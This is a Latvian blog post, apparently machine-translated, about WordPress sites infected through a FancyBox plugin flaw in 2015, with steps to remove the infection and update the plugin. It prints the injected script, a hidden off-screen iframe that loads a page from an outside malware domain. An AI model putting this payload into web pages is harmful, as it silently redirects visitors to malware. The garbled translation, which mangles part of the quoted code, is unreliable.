Nedēļas sākumā virkne vietņu un emuāru ar WordPress, saņemti brīdinājumi par ļaunprātīgas programmatūras infekcija cauri Google tīmekļa pārziņiApvidū
Problēma, uz kuru Google tīmekļa pārziņi attiecas uz a klātbūtni mencas / skripts iframe ļaunprātīga programmatūra avota tīmekļa lapās.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Šķiet, ka runa ir par a ievainojamība izšķirt spraudnisiegūtFancyBox darbam ar WordPress kas līdz vakardienai (05.02.2015.) ilgu laiku nebija aktualizēts.
Atrisinot šo problēmu un vīrusu vietu dezinfekcija ar šo ļaunprātīgo programmatūru tas ir salīdzinoši vienkārši.
1. Atspējojiet spraudni FancyBox.
2. Izdzēsiet visus FancyBox spraudņu failus no servera (izmantojot FTP)
3. Instalējiet jauno spraudņa versiju (FancyBox 3.0.4)
FancyBox for WordPress 3.0.4
– Pārdēvēja iestatījumu, kuru ietekmēja 3.0.3. norādītā drošības problēma. Tam vajadzētu apturēt ļaunprātīgā koda parādīšanos vietnēs, kurās tiek atjaunināts spraudnis, nenoņemot ļaunprātīgo kodu.
FancyBox for WordPress 3.0.3
– Novērsta drošības problēmaApvidū
Informācija par ļaunprātīgu programmatūru:
VEIDS: Iframe novirzīšana
MĒRĶIS: WordPress Fancybox
Ļaunprātīgas programmatūras DOMĒNS: 203koko.eu
Ļaunprātīgas programmatūras URI: http://203koko.eu/hjnfh/ipframe2.php
Ļaunprātīgas programmatūras RAW KODS: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” platums=”20″ augstums =”30″ ></iframe>
Ļaunprātīgas programmatūras skripts: <skripts>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”pozīcija: absolūts; pa kreisi: -2000 pikseļi; platums: 2000 pikseļi”>
Noņemiet ļaunprātīgu programmatūru no savas WordPress vietnesApvidū
